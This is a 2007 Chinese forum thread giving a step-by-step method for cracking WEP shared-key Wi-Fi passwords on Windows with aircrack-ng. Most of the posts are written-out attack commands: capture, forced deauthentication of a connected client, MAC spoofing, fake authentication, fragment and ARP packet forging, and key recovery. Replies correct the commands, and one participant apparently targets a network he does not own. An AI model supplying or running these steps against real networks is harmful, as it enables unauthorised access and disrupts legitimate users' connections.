jiuweiljp 发表于 2007-12-7 18:54

原创 windows 下 破解 wep 共享认证方式

<p>呵呵!其实这个也不是我的原创只不过这个论坛没有人发这样的贴子而已</p><p>灵感来源 :Anonymous发的BackTrack2下破解无线WPA-PSK加密实战</p><p><br/>
                <a href="http://forum.anywlan.com/dispbbs.asp?boardID=15&amp;ID=6620&amp;page=2">http://forum.anywlan.com/dispbbs.asp?boardID=15&amp;ID=6620&amp;page=2</a></p><p>参考质料:<a href="http://www.aircrack-ng.org/doku.php?id=shared_key">http://www.aircrack-ng.org/doku.php?id=shared_key</a></p><p>前言:-----------个人理解,有所不妥请指正-------------</p><p>其实wap-psk 也是一种共享认证方式</p><p>不同之处就是wap-psk密码是变化的并且有数据包认证,而wep密码则没有wap-psk这样的特点这样</p><p>造成有空可钻了。</p><p>在bt2 下本人没有测试根据这个原理我想是可以的</p><p>------------------------------------------------------------------------------------------------------------------------</p><p>破解前提:wep 环境中必须有一个已经通过认证的客户端(线上必须有人)</p><p>环境:windows xp2</p><p>使用软件:aircrack-ng-svn-win rev 687</p><p>搭建环境提示:不能用开放式的方式认证必须先填写网络特定信息 下为图片</p><p></p><p></p><p>未完待续 请网友不要跟贴 谢谢<br/></p>

jiuweiljp 发表于 2007-12-8 14:49

<p>补充贴<br/>本人发过两个在windows下破解 wep密码的帖子<br/>但是都有缺憾 没能破解128位的加密<br/>今天终于搞定了128位加密,上图一张</p><p>主要还是ivs不够,这个花了40分钟 40多万个包才解开的</p><p>没有使用PTW attack<br/><br/></p>

jiuweiljp 发表于 2007-12-7 19:26

<p>破解前提 </p><p>1、安装 CommView 驱动 具体方法可见我的贴</p><p>
                <a href="http://forum.anywlan.com/dispbbs.asp?boardID=15&amp;ID=7225&amp;page=3">http://forum.anywlan.com/dispbbs.asp?boardID=15&amp;ID=7225&amp;page=3</a></p><p>2、必须知道 对方的 1、使用的通道 2、ap essid 3、ap bssid 4、线上客户端的mac 地址 </p><p>(以上信息的来源论坛上已经有贴子阐述我就不写了,)</p><p>3、在widnows 下 最重要的是将将自己的mac 改为 线上客户端的mac</p><p><br/></p><p>开始破解</p><p>1、点击开始-〉运行 输入 cmd点击确定 进入aircrack-ng 的目录(该过程本文以后简称 开窗口)</p><p>2、输入 start cmd /k airserv-ng -c &lt;通道号&gt; -d "commview.dll|debug"</p><p>   选择正确的网卡 带 字符的就是了 </p><p>   在该对话框中需要你输入 y</p><p><br/></p><p>3、输入 start cmd /k airodump-ng --showack --bssid &lt;ap 的bssid&gt; -w &lt;需要存盘的文件名如:capture&gt; --channel &lt;ap 是用的通道号&gt; 127.0.0.1:666</p><p><br/></p><p>未完待续</p>

jiuweiljp 发表于 2007-12-7 20:21

<p>4、使用deauthenticate 方式强迫客户端下线 这样可获得prga 包</p><p>aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; 127.0.0.1:666</p><p><br/></p><p>使用 这个命令以后目录下会多出 一个 capture-01-xx-xx-xx-xx-xx-xx.xor的文件</p><p>注:xx-xx-xx-xx-xx-xx为 ap 的 bssid 这个就是prga 包了</p><p>5、使用 fake authentication</p><p>输入 aireplay-ng -1 0 -e &lt;essid&gt; -a &lt;bssid&gt; -y capture-01-xx-xx-xx-xx-xx-xx.xor 127.0.0.1:666</p><p>会出现</p><p></p><p>等到出现下一个画面就ok了!!在中间的过程中屏幕会不停的滚动</p><p><br/></p><p>为了出现这一个画面我可是费了不少功夫 国外的资料没有介绍 只有些提示</p><p>后来将本机的mac 改为 已经认证的客户端的mac 才成功的</p><p>未完待续</p>

jiuweiljp 发表于 2007-12-7 20:46

<p>6、fake authentication这个过程成功以后,相信有经验的朋友知道我准备干什么了吧!呵呵</p><p>   输入 aireplay-ng -5 -h &lt;你的破解网卡的mac&gt; -b &lt;ap的bssid&gt; 127.0.0.1:666</p><p>注意这一步别选错了包 因为在这个网络上有相同的两个mac 有可能选到另外一个客户端的包</p><p><br/>成功以后出现</p><p><br/>记住这个 fragment-xxxx-xxxxxx.xor文件下一步要用它</p><p>7、输入 packetforge-ng -0 -a &lt;ap的bssid&gt; -h &lt;你的破解网卡的mac&gt; -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp</p><p>回答y就可以了</p><p><br/>8、回到 airodump-ng 屏幕 你会发现 data 数字在不断增加,</p><p><br/>9、等到 数字增加到 一定数量后 64位在widows 20000个基本上购了,128位在windows 下 我目前破解不开</p><p>国外的论坛说有可能需要 150万(天啦这要多长时间呀!呵呵)</p><p>结果出来了!怎么用可以看我的第一贴 记得要将mac 改回来哟!不然这个网络将会有些问题<br/>破解完了以后 经我测试那个正常的客户端会很慢,基本上不能通讯</p><p><br/></p><p>后言------</p><p>使用bt2的朋友可以将我这个办法试试相信会成功的!!好运!!</p><p>以上有什么不正确的地方请指正!谢谢</p><p>刚刚看到 斑竹 送了20金币 !!555555555没有ap可以送!!哈哈</p>

zero 发表于 2007-12-7 21:46

<p>要送AP,你得把你的文章整理整理,通俗易懂,然后发给tange,论坛奖励贴指定的EMAIL地址。</p>

fwfw5ff 发表于 2007-12-8 21:53

学习中,感谢楼主!辛苦了.

longas 发表于 2007-12-9 01:36

<font face="Verdana" color="#61b713"><b>jiuweiljp,以后也</b></font><font face="Verdana" color="#61b713"><b>请继续支持论坛!!<br/><br/>不过下次不要请看清再注明“</b></font><span style="font-weight: bold;">灵感来源 :Anonymous发的BackTrack2下破解无线WPA-PSK加密实战</span><font face="Verdana" color="#61b713"><b>”<br/><br/>........我不叫</b></font><span style="font-weight: bold;">Anonymous</span>

snake9999 发表于 2007-12-9 07:50

<p>楼主的步骤应该是正确的,可以破解!不过要指出你其中的一条关键命令错误和条件没有说明:</p><p>第4步中、使用deauthenticate 方式强迫客户端下线 这样可获得prga 包!<br/>aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; 127.0.0.1:666<br/>使用 这个命令以后目录下会多出 一个 capture-01-xx-xx-xx-xx-xx-xx.xor的文件!</p><p>方法是就是这样,强迫合法客户端下线又连!但是命令错了!</p><p>完整的我们还应该加-h &lt;你网卡的MAC&gt;,是啊?有人要问我们的MAC不是改为了合法客户端的MAC,也就是和他一样的MAC了吗?对,问题就出来,条件也引出来了,所以我们需要另外一张网卡或者是另外一台客户端来获取capture-01-xx-xx-xx-xx-xx-xx.xor的文件!</p><p>aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; -h &lt;另外一网卡的MAC&gt; 127.0.0.1:666</p><p>这样命令就成功了,等待吧!</p><p>如果是楼主说的:</p><p>aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; 127.0.0.1:666<br/>会提示你缺少-y和原mac</p><p>aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; -h &lt;网卡改后MAC&gt; 127.0.0.1:666</p><p>其中线上的客户端mac=网卡改后MAC</p><p>我运行了50次都没有生成capture-01-xx-xx-xx-xx-xx-xx.xor 文件!!!!!</p><p>我说的可能也有错。。。。希望其他朋友在补充补充!</p><p></p>

jiuweiljp 发表于 2007-12-9 21:28

<div class="msgheader">QUOTE:</div><div class="msgborder"><b>以下是引用<i>longas</i>在2007-12-9 1:36:11的发言:</b><br/><font face="Verdana" color="#61b713"><b>jiuweiljp,以后也</b></font><font face="Verdana" color="#61b713"><b>请继续支持论坛!!<br/><br/>不过下次不要请看清再注明“</b></font><span style="font-weight: bold;">灵感来源 :Anonymous发的BackTrack2下破解无线WPA-PSK加密实战</span><font face="Verdana" color="#61b713"><b>”<br/><br/>........我不叫</b></font><span style="font-weight: bold;">Anonymous</span><img border="0" align="middle" alt="图片点击可在新窗口打开查看" src="Skins/Default/emot/em16.gif" title="dvubb"/></div><p></p><span style="font-weight: bold;">Sorry Sorry </span><b><i>longas我错了下次不敢了!!呵呵<br/><br/>还有 </i></b><font face="Verdana" color="#61b713"><b>snake9999 <br/>我测试在第4步中使用 airodump-ng 除了用wep共享认证方试以外,其他的 wep开放、</b></font>WPA-tkip、WPA-aes-ccmp、WPA2-tkip、WPA2-aes-ccmp都不会产生 capture-01-xx-xx-xx-xx-xx-xx.xor 这个文件,希望大家共同<br/>探讨。<br/><br/><br/>最后需要说明的是:wep共享模式在实际使用的非常少见,毕竟从安全性和方便性来说它他没有wpa方便、安全<br/>,写这个贴子没有什么实用价值,只是在技术上探讨探讨!!<br/>还有,今天做了试验、在windows下 可以正常用字典破解 WPA-tkip、WPA-aes-ccmp、WPA2-tkip、WPA2-aes-ccmp<p></p>

snake9999 发表于 2007-12-15 19:06

<p>楼主我等了2周了,都没发现有合法的客户端连接我要破的那个共享认证TP-LINK网络!等得郁闷啊!</p><p>上面的关于第4步中,aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; -h &lt;网卡改后MAC&gt; 127.0.0.1:666试验了,还是能生成capture-01-xx-xx-xx-xx-xx-xx.xor 文件!但没有试验破解过程!</p><p>我补充的aireplay-ng -0 10 -a &lt;ap的bssid&gt; -c &lt;线上的客户端mac&gt; -h &lt;自己的网卡MAC&gt; 127.0.0.1:666,加了-h &lt;自己的网卡MAC&gt;   一次就破了试验的共享认证AP!嘿嘿!而且不用把自己的网卡也改为合法客户端MAC一样的地址!<br/></p>

jiuweiljp 发表于 2007-12-15 21:03

<p>其实不需修改自己的mac 地址也可以生成capture-01-xx-xx-xx-xx-xx-xx.xor 这个文件</p><p>主要是在下一步 fake authentication(aireplay-ng -1 0 -e &lt;essid&gt; -a &lt;bssid&gt; -y capture-01-xx-xx-xx-xx-xx-xx.xor 127.0.0.1:666)</p><p> 利用这个生成文件的时候,如果没有变更自己的mac,这一步在我这里无法成功!</p><p>我找时间再详细测试一下!!</p><p><strong><font face="Verdana" color="#61b713">snake9999 看来你也对共享认证方式很感兴趣!</font></strong></p><p><strong><font face="Verdana" color="#61b713">这几天我主要在国外的论坛上溜达,根据目前的资料来看好像无法破解没有客户端的共享认证的密码!!!!</font></strong></p><p><strong><font face="Verdana" color="#61b713"></font></strong></p>
页: [1] 2 3 4 5 6
查看完整版本: 原创 windows 下 破解 wep 共享认证方式